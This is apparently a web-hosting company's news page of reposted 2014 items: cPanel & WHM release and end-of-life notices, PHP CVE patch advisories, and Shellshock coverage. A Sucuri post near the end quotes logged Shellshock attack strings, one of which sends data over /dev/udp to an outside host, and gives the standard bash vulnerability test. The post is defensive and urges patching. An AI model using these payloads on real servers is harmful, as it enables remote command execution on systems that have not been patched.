SEO Hosting FAQFlexible SEO Hosting – Pay only for what you need!

Logaholic will be discontinued after cPanel & WHM 11.46.

December 12th, 2014

The cPanel & WHM Dashboard Will Be Getting a Little Lighter.

Greetings cPanel & WHM user,

We’re always working to create a better experience for our users and sometimes that means removing a great feature to streamline the cPanel dashboard.

Logaholic will no longer be included in future versions of the cPanel & WHM dashboard. In its place, users can opt-in to download their stronger, more robust third-party plugin. Information on installing this plugin, which includes a wide array of new tools, is available on their company blog, using the link below.

We will continue to offer full access and support for Logaholic until cPanel & WHM 11.46 reaches End of Life in October 2015. To continue using Logaholic after this point, all you have to do is install the Logaholic third-party app.

Navigate to the Logaholic blog below to find out how to install this powerful new plugin:

http://www.logaholic.com/logaholic-cpanel-migration/

Notice: 11.42 to EOL in 2 Months

December 10th, 2014

cPanel & WHM 11.42 is set to reach End of Life at the end of January 2015.

In accordance with our EOL policy [http://go.cpanel.net/longtermsupport], 11.42 will continue functioning on servers. However, no further updates, such as security fixes and installations, will be provided for 11.42 after it reaches EOL.

We recommend that all customers migrate any existing installations of cPanel & WHM 11.42 to a newer version (either 11.44 or 11.46).

If your server setup complicates the process of migrating to a newer version of cPanel & WHM (an upgrade blocker list is available at http://go.cpanel.net/blockers), then cPanel is here to help. Simply open a support ticket at https://tickets.cpanel.net/submit so that our knowledgeable support team can provide recommendations, migration assistance, and more.

About cPanel, Inc.
Since 1997, cPanel, Inc. has been a leading innovator and developer of control panel software for the web hosting industry. cPanel builds software that allows web host professionals to transform standalone servers into fully automated, point-and-click web hosting platforms. cPanel-licensed software allows server and website owners, along with resellers and developers, to optimize their technical resources and replace tedious shell-oriented tasks with dynamic, intuitive web-based interfaces. For more information, visit http://cpanel.net.

cPanel & WHM 11.46 Now in STABLE Tier

December 10th, 2014

cPanel, Inc. is thrilled to release cPanel & WHM software version 11.46, which is now available in the STABLE tier.

cPanel & WHM 11.46 offers localization and support for 29 languages, Paper Lantern branding, ModSecurity tools, and more.

Localization & Support for 29 Languages
As part of version 11.46, cPanel & WHM makes it possible to fully translate the user interface and increases the number and quality of languages provided. With the ability to localize and choose from 29 updated languages, cPanel & WHM offers unprecedented access on an international scale.

Paper Lantern Branding
cPanel & WHM 11.46 includes several options for customizing and branding the Paper Lantern theme.

ModSecurity Tools
New management tools, available in cPanel & WHM 11.46, simplify use of the ModSecurity application firewall.

Detailed information on all cPanel & WHM 11.46 features can be found at cPanel Documentation. An overview of the latest features and benefits is also available at cPanel Releases.

Microsoft® FrontPage® Blocking 11.46 Upgrades:

November 25th, 2014

For many cPanel & WHM customers, an existing installation of Microsoft® FrontPage® extensions on their Linux server(s) is blocking the ability to upgrade to cPanel & WHM software version 11.46. Microsoft® discontinued support for FrontPage® extensions on Linux servers in 2006.

Blockers are conditions that will not allow the cPanel & WHM update process (upcp) to install a particular version. For more information on upgrade blockers, visit Upgrade Blockers.

Please note that the FrontPage® RPM and the FrontPage® opt mod (mod_frontpage) in EasyApache are separate entities. The presence of mod_frontpage will not block upgrades to cPanel & WHM version 11.46.

IMPACT
If you do not remove existing installations of Microsoft® FrontPage® extensions on your Linux server(s), you will be unable to upgrade to cPanel & WHM 11.46.

AFFECTED VERSIONS
• cPanel & WHM 11.46
SOLUTION
If you are having trouble upgrading to 11.46, please take the following steps to remove Microsoft® FrontPage® RPM from your Linux server(s).

INSTRUCTIONS
In WHM:
1. Navigate to Home >> FrontPage >> Uninstall FrontPage Extensions.
2. Select the account for which you would like to uninstall the extensions.
3. Click UnInstall.
Or

From the command line:
• Run /scripts/unsetupfp4 –all as the root user.
We strongly recommend that you rebuild EasyApache without FrontPage® before you attempt to upgrade.

For more information on the Microsoft® FrontPage® blocker for cPanel & WHM 11.46 and how to determine if your server is affected, visit 11.46 FrontPage® Update Blocker.

Need help? Simply open a support ticket at cPanel Customer Portal so that our knowledgeable support team can provide recommendations, migration assistance, and more.

EasyApache 3.26.10 Released

November 18th, 2014

SUMMARY
cPanel, Inc. has released EasyApache 3.26.10 with PHP version 5.5.19 and PHP version 5.4.35. This release addresses vulnerabilities related to CVE-2014-3710 by fixing bugs in the Fileinfo module. We strongly encourage all PHP 5.5 users to upgrade to version 5.5.19 and all PHP v5.4 users to upgrade to version 5.4.35.

AFFECTED VERSIONS
All versions of PHP 5.4 through version 5.4.34.
All versions of PHP 5.5 through version 5.5.18.

SECURITY RATING
The National Vulnerability Database (NIST) has given the following severity ratings to these CVEs:

CVE-2014-3710 – MEDIUM

PHP 5.4.35
Fixed bug in the Fileinfo module related to CVE-2014-3710

PHP 5.5.19
Fixed bug in the Fileinfo module related to CVE-2014-3710

SOLUTION
cPanel, Inc. has released EasyApache 3.26.10 with updated versions of PHP 5.5.19 and PHP 5.4.35. Unless you have disabled EasyApache updates, EasyApache updates automatically. Run EasyApache to rebuild your profile with the latest version of PHP.

REFERENCES

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3710

http://php.net/ChangeLog-5.php

cPanel & WHM 11.46 Now in RELEASE Tier

November 5th, 2014

11.46 Now in RELEASE Tier

cPanel, Inc. is thrilled to release cPanel & WHM software version 11.46, which is now available in the RELEASE tier.

cPanel & WHM 11.46 offers localization and support for 29 languages, Paper Lantern branding, ModSecurity tools, and more.

Localization & Support for 29 Languages
As part of version 11.46, cPanel & WHM makes it possible to fully translate the user interface and increases the number and quality of languages provided. With the ability to localize and choose from 29 updated languages, cPanel & WHM offers unprecedented access on an international scale.

Paper Lantern Branding
cPanel & WHM 11.46 includes several options for customizing and branding the Paper Lantern theme.

ModSecurity Tools
New management tools, available in cPanel & WHM 11.46, simplify use of the ModSecurity application firewall.

Detailed information on all cPanel & WHM 11.46 features can be found at cPanel Documentation. An overview of the latest features and benefits is also available at cPanel Releases.

cPanel Notice: 11.40 Now EOL, 11.42 to EOL in 3 Months

November 4th, 2014

Notice: 11.40 Now EOL, 11.42 to EOL in 3 Months

cPanel & WHM software version 11.40 has now reached End of Life.

In accordance with our EOL policy [http://go.cpanel.net/longtermsupport], 11.40 will continue functioning on servers. The last release of cPanel & WHM 11.40, 11.40.1.22, will remain on our mirrors indefinitely. However, no further updates, such as security fixes and installations, will be provided for 11.40. Older releases of cPanel & WHM 11.40 will be removed from our mirrors.

cPanel & WHM 11.42 is set to reach End of Life at the end of January 2015.

We recommend that all customers migrate any existing installations of cPanel & WHM 11.42 to a newer version (either 11.44 or 11.46).

If your server setup complicates the process of migrating to a newer version of cPanel & WHM (an upgrade blocker list is available at http://go.cpanel.net/blockers), then cPanel is here to help. Simply open a support ticket at https://tickets.cpanel.net/submit so that our knowledgeable support team can provide recommendations, migration assistance, and more.

About cPanel, Inc.
Since 1997, cPanel, Inc. has been a leading innovator and developer of control panel software for the web hosting industry. cPanel builds software that allows web host professionals to transform standalone servers into fully automated, point-and-click web hosting platforms. cPanel-licensed software allows server and website owners, along with resellers and developers, to optimize their technical resources and replace tedious shell-oriented tasks with dynamic, intuitive web-based interfaces. For more information, visit http://cpanel.net.

EasyApache 3.26.9 Released

October 24th, 2014

SUMMARY
cPanel, Inc. has released EasyApache 3.26.9 with PHP versions 5.4.34 and 5.5.18 and libxml2 version 2.9.2. This release addresses vulnerabilities related to CVE-2014-3669, CVE-2014-3670, CVE-2014-3668, CVE-2014-3660, and CVE-2014-0191 by fixing bugs in the Core, Exif, and XMLRPC modules and in libxml2. We strongly encourage all PHP 5.4 users to upgrade to PHP version 5.4.34 and all PHP 5.5 users to upgrade to version 5.5.18.

AFFECTED VERSIONS
All versions of PHP 5.4 through version 5.4.33 and PHP 5.5 through version 5.5.17.
All versions of libxml2 before EasyApache version 3.26.9.

SECURITY RATING
The National Vulnerability Database (NIST) has given the following severity ratings to these CVEs:

CVE-2014-3669 – MEDIUM

PHP 5.4.34
Fixed bug in the Core module related to CVE-2014-3669

PHP 5.5.18
Fixed bug in the Code module related to CVE-2014-3669

CVE-2014-3670 – MEDIUM

PHP 5.4.34
Fixed bug in Exif module related to CVE-2014-3670

PHP 5.5.18
Fixed bug in Exif module related to CVE-2014-3670

CVE-2014-3668 – MEDIUM

PHP 5.4.34
Fixed bug in XMLRPC related to CVE-2014-3668

PHP 5.5.18
Fixed bug in XMLRPC related to CVE-2014-3668

CVE-2014-3660 – MEDIUM

libxml2
Fixed bug related to CVE-2014-3660

CVE-2014-0191 – MEDIUM

libxml2
Fixed bug in the libxml2 library related to CVE-2014-0191.

SOLUTION
cPanel, Inc. has released EasyApache 3.26.9 with updated versions of PHP 5.4.34, PHP 5.5.18 and libxml2 2.9.2 to correct these issues. Unless you have disabled EasyApache updates, EasyApache updates automatically. Run EasyApache to rebuild your profile with the latest version of PHP and libxml2.

REFERENCES

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3669

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3670

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3668

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3660

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0191

http://php.net/ChangeLog-5.php

http://xmlsoft.org/news.html

cPanel & WHM 11.46 Now in CURRENT Tier

October 24th, 2014

11.46 Now in CURRENT Tier

10/22/2014
Houston, TX -

cPanel, Inc. is thrilled to release cPanel & WHM software version 11.46, which is now available in the CURRENT tier.

cPanel & WHM 11.46 offers localization and support for 29 languages, Paper Lantern branding, ModSecurity tools, and more.

Localization & Support for 29 Languages
As part of version 11.46, cPanel & WHM makes it possible to fully translate the user interface and increases the number and quality of languages provided. With the ability to localize and choose from 29 updated languages, cPanel & WHM offers unprecedented access on an international scale.

Paper Lantern Branding
cPanel & WHM 11.46 includes several options for customizing and branding the Paper Lantern theme.

ModSecurity Tools
New management tools, available in cPanel & WHM 11.46, simplify use of the ModSecurity application firewall.

Detailed information on all cPanel & WHM 11.46 features can be found at cPanel Documentation. An overview of the latest features and benefits is also available at cPanel Releases.

Hackers Exploit Shellshock Vulnerability to Gain Access to Yahoo Servers

October 8th, 2014

Romanian hackers have exploited the Shellshock vulnerability to gain access to Yahoo servers, according to Jonathan Hall of security consulting company Future South Technologies. Hall announced the hack of Yahoo, as well as Lycos and WinZip, on the Future South blog after informing the companies and the FBI.

According to a series of blog posts, Hall discovered the vulnerabilities on Saturday night, and watched overnight as the exploit expanded. Hall claims he began attempting to alert Yahoo before 5 am CST, but that it, like the other two companies, was slow to respond.

WinZip confirmed to Hall that they were hacked, while Lycos initially denied that it had been breached, and subsequently admitted the need for further testing. Yahoo confirmed that it had been breached midday on Sunday, and on Monday Yahoo CISO Alex Stamos posted a response to the incident to Hacker News.

“Earlier today, we reported that we isolated a handful of servers that were detected to have been impacted by a security flaw. After investigating the situation fully, it turns out that the servers were in fact not affected by Shellshock,” Stamos said. “Regardless of the cause our course of action remained the same: to isolate the servers at risk and protect our users’ data. The affected API servers are used to provide live game streaming data to our Sports front-end and do not store user data. At this time we have found no evidence that the attackers compromised any other machines or that any user data was affected. This flaw was specific to a small number of machines and has been fixed, and we have added this pattern to our CI/CD code scanners to catch future issues.”

Stamos also responded to allegations by Hall that Yahoo had been slow to react to the breach, saying that the affected systems had been isolated and the investigation begun within an hour of the email Hall addressed to CEO Marissa Mayer.

Hall in turn responded to Stamos, at first accusing him of giving misleading information, and then trashing Stamos’ explanation for how the breach really occurred.

“I’m not saying for a fact that more than what they are saying was compromised was,” said Hall. “But what I am saying for a fact is that there’s no way in hell they can be certain when they can’t even honestly provide a technical explanation of how the breach occurred in the first place.”

The Independent notes Yahoo’s reputation for under appreciating bug bounty hunters. Yahoo gave a $25 voucher to an ethical hacker who disclosed three bugs in Yahoo servers last year.

by Chris Burt on October 7, 2014

Hackers thrash Bash Shellshock bug: World races to cover hole

September 26th, 2014

Sysadmins and users have been urged to patch the severe Shellshock vulnerability in Bash on Linux and Unix systems – as hackers ruthlessly exploit the flaw to compromise or crash computers.

But as “millions” of servers, PCs and devices lay vulnerable or are being updated, it’s emerged the fix is incomplete.

The flaw affects the GNU Bourne Again Shell – better known as Bash – which is a widely installed command interpreter used by many Linux and Unix operating systems – including Apple’s OS X.

It allows miscreants to remotely execute arbitrary code on systems ranging from web servers, routers, servers and Macs to various embedded devices that use Bash, and anything else that uses the flawed open-source shell.

An attacker needs to inject his or her payload of code into the environment variables of a running process – and this is surprisingly easy to do, via Apache CGI scripts, DHCP options, OpenSSH and so on. When that process or its children invoke Bash, the code is picked up and executed.

The Bash flaw – designated CVE-2014-6271 – is being exploited in the wild against web servers, which are the most obvious targets but not by any means the only machines at risk.

Patches released on Wednesday by Linux vendors, the upstream maintainer of Bash, and others for OS X, blocked these early attacks, but it’s understood they do not completely protect Bash from code injection via environment variables.

New packages of Bash were rolled out on the same day, but further investigation made it clear that the patched version is still exploitable, and at the very least can be crashed due to a null-pointer exception. The incomplete fix is being tracked as CVE-2014-7169.

Red Hat, at time of writing, is urging people to upgrade to the version of Bash that fixes the first reported security hole, and not wait for the patch that fixes the secondary lingering vulnerability – designated CVE-2014-7169.

“CVE-2014-7169 is a less severe issue and patches for it are being worked on,” the Linux maker said.

Meanwhile, although Ubuntu and other Debian-based distros have moved to using the non-vulnerable Dash over Bash, the latter may well be present or in use by user accounts. Above all, check what shell interpreters are installed, who is using them, and patch CVE-2014-6271 immediately.

By John Leyden, 25 Sep 2014

Bash Vulnerability – Shell Shock – Thousands of cPanel Sites are High Risk

September 26th, 2014

The team behind the Bash project (the most common shell used on Linux) recently issued a patch for a serious vulnerability that could allow for remote command execution on servers running the vulnerable bash versions.

Wait, remote command execution on bash? You are likely asking yourself, “How can someone remotely execute commands on a local shell?”

The issue starts with mod_cgi and how web servers interact with CGI programs (that could be written in Perl, PHP, Shell scripting or any other language). The web server passes (environment) user variables to them so they can do their work. In simple terms, this vulnerability allows an attacker to pass a command as a variable that gets executed by bash.

It means that if you are using mod_cgi on your webserver and you have a CGI written in shell script, you are in deep trouble. Drop everything now and patch your servers.

If you have CGI’s written on any other language, but you are using “system()”, “(backticks)” or executing any commands from the CGI, you are in deep trouble. Drop everything now and patch your servers.

If you don’t know what you have, Drop everything now and patch your servers.

Who is vulnerable?

Almost every server in the Internet is vulnerable to it (every server has Bash). But not all sites are actually exploitable.

I mean, who really still uses mod_cgi instead of mod_php/fast_cgi that would be safe? Or who would write a CGI in shell scripting?

cPanel users at Risk

Well, turns out cPanel does that for some of their internal tools.

As we started to scan our clients sites (and the Internet as a whole) we found that about 2.9% of all sites we scanned were vulnerable to this problem. All of them were running cPanel and had these 2 files available:
/cgi-sys/entropysearch.cgi
/cgi-sys/FormMail-clone.cgi

When we talk about millions of websites online, 2.9% is a lot. Just from our investigation, we found thousands of websites vulnerable and easily compromised.

If you are using cPanel, you have to patch your servers right away (or remove these files from the server)!

For Sucuri clients, sites behind our Website Firewall / WAF are already protected against it.

But we still recommend patching.

Attacks in the Wild

We are seeing many scans for this vulnerability in the wild, but mostly coming from security researchers trying to understand the severity of it (nothing really bad yet). So far, these two IP addresses (166.78.61.142, 24.251.197.244) are hitting every site they can, trying to trigger the vulnerability

166.78.61.142 – – [25/Sep/2014:06:28:47 -0400] “GET / HTTP/1.1″ 200 193 “-” “() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444″

24.251.197.244 – – [25/Sep/2014:07:49:36 -0400] “GET / HTTP/1.1″ 200 193 “-” “() { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq”

We have not detected any massive scans looking for real CGI that would be vulnerable (that’s where the problem lies).

Even if you are using mod_php for your web application (like WordPress or Joomla), you have to make sure that mod_cgi is not enabled for things like your cpanel backend or Plesk or any other management tool.

In a few more days we will see real scans and actual attacks attempting to exploit this Shell Shock vulnerability.

NIX System Administrators

You’re in luck with this one, identifying if you’re vulnerable is easier than previous vulnerabilities. Log into your server and via terminal run this command:
[root@yourawesomeserver ~]# env x='() { :;}; echo vulnerable’ bash -c ‘echo hello’

If you are vulnerable it will return:
[root@yourawesomeserver ~]# env x='() { :;}; echo vulnerable’ bash -c ‘echo hello’
vulnerable
hello

To fix it will depend on your NIX distribution but you will want to reinstall or update, which ever you prefer:
#sudo apt-get install bash

- or –

#sudo yum update bash

Once complete, rerun the test and you will get:
[root@yourawesomeserver ~]# env x='() { :;}; echo vulnerable’ bash -c ‘echo hello’
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x’
hello

By Daniel Cid on September 25, 2014

Specify Your C-Class IP Needs

Fill in the details below and we'll come back with an unbeatable offer for you.This information will not be shared with any third party.
Choose from 10-5000 C-Class IPs
Choose from 1 to 10 IPs per C-Class
* All fields are Required to be filled in before your request will be sent. Message:
captcha
*Type The Characters Above Into The Box On The Right


Privacy Policy